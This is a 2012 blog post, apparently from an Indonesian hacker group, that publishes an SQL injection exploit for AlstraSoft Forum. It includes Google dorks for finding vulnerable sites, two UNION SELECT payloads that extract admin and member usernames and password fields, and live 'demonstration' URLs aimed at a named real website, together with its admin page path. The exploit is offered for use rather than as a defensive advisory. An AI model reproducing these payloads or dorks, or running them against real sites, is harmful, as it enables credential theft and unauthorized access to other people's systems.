Saturday, January 21, 2012

AlstraSoft Forum remote sql i vulner

6:42 AM gilang No comments

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfMojLvZCXnMqHVhfKtJng07iTKoVSb_okC8YHEKyjPY8XdQ_JwAkAXpWEU0Xr0hG1mLPRp7ZZC03Mm0uK6mhX1-3S3JPMIKDiunUk77iTR5AWEeZNIapXGSRdJnGcY72IxDAsRdemNkam/s1600/SQLInjection1-hvlind.jpg 

# Exploit title:  AlstraSoft Forum remote sql i vulner
#
# App Home: http://www.alstrasoft.com/
#
# Dork: inurl:index.php?menu=showcat=
# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
#
#Author : gilang xzone
# Home :www.gilang-xzone.net
#
#
#
# POC: admin id dan paswd
#      index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin--
#
# P0C-2: untuk username aka member
#       index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--
#
# demonstrasi :
#
# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin--
#
# demonstrasi user nya bukan admin :
#  http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1--
#admin page : www.site/admin 

greetz : medan cyber team / code breaking force / hogyz / newbie herbet / harie / topeng hitam / andre aka bl69 / dark / syndrom / abay / and all musil hackers

quote : NO SOPA NO PIPA JUST FREE PALESTINE
ALLAHUAKBAR

Posted in: ,

0 comments :

Post a Comment

 
Design by blogger templates | powered by cbfteam official | zone-h